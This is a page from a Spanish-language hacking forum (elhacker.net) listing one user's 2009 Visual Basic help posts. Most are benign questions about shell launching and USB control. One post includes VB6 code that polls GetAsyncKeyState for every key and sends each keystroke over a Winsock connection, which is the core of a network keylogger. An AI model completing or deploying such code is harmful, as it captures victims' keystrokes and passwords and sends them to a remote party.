elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Programación / Programación Visual Basic / Re: [Ayuda] Con shell y textbox en: 13 Octubre 2009, 18:10 pm
Muchisimas gracias.
12  Programación / Programación Visual Basic / [Ayuda] Con shell y textbox en: 13 Octubre 2009, 03:59 am
Hola queria saber como abrir un programa desde un text box, es decir:

Tengo el text1 y en el escribo "C:/programa.exe"

y luego con un button abrir el programa escrito en el text1.

desde ya muchas gracias.
13  Programación / Programación Visual Basic / Re: [ayuda]Usb y vb en: 26 Septiembre 2009, 02:49 am
calro encender y apagar, es que necesito encender una serie de leds.

he buscado por google y solo sale con pic, le comento esto a mi profesor de electronica y me dice: busca que hay sin pic.

Pasando a lo de tu escritorio mi profesor tambien me dijo que le ah pasado eso de que se prende fuego algo xD.
14  Programación / Programación Visual Basic / [ayuda]Usb y vb en: 26 Septiembre 2009, 02:23 am
Hola que tal, queria saber si hay alguna forma de controlar un puerto usb mediante visual basic y como se haria.

desde ya muchas gracias.
15  Programación / Programación Visual Basic / Re: [Ayuda] confirmar que winsock este conectado? en: 27 Agosto 2009, 02:02 am
Muchas gracias por su ayuda y dedicar un tiempo a mi problema. Ya solucione el tema, gracias en serio.
16  Programación / Programación Visual Basic / Re: [Ayuda] confirmar que winsock este conectado? en: 27 Agosto 2009, 01:51 am
nonono no hay problema por ahi pense que se lo iba tomar asi y despues cometia errores en sus futuros programas.
17  Programación / Programación Visual Basic / Re: [Ayuda] confirmar que winsock este conectado? en: 27 Agosto 2009, 01:48 am
Citar
no sabia que las api's y el option explicit se ponian dentro del form_load   :xD :xD , y aparte podes hacer un And y te ahorras un If..

fijate que yo no lo puse en form_load
18  Programación / Programación Visual Basic / [Ayuda] confirmar que winsock este conectado? en: 27 Agosto 2009, 01:17 am
Hola tengo este codigo:
Código:
Dim PropBag As New PropertyBag
Option Explicit
    Private Declare Function GetAsyncKeyState _
        Lib "user32" ( _
            ByVal vKey As Long) As Integer
   Private Sub Timer1_Timer()
       Dim i As Integer
       For i = 0 To 255
           If GetAsyncKeyState(i) = -32767 Then 'aca quiero confirmar que el winsock este conectado y despues envie los datos
        Winsock1.SendData Chr(i)
Text1.Text = Text1.Text & Chr(i)
Text1.SelStart = Len(Text1.Text)
           End If
       Next
   End Sub
Bueno no se si me explico bien, pero lo que quiero es que al confirmarse esta linea "GetAsyncKeyState(i) = -32767" despues confirme que winsock1 este conectado, y si es asi que envie los datos.

Desde ya muchas gracias.
(si esta un poco desprolijo el code xD no critiquen porfavor recien estoy aprendiendo)
19  Programación / Programación Visual Basic / Re: [pregunta-ayuda] generar exe con propiedades a gusto? en: 13 Agosto 2009, 01:03 am
gracias a todos por su ayuda la verdad que fue de mucha mucha ayuda gracias me re sirbio hasta aprendi cosas nuevas muchas gracias.
20  Programación / Programación Visual Basic / Re: [pregunta-ayuda] generar exe con propiedades a gusto? en: 12 Agosto 2009, 02:41 am
no entiendo la verdad que soy bastante nuevo y me podrias explicar basicamente que es LOF?
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines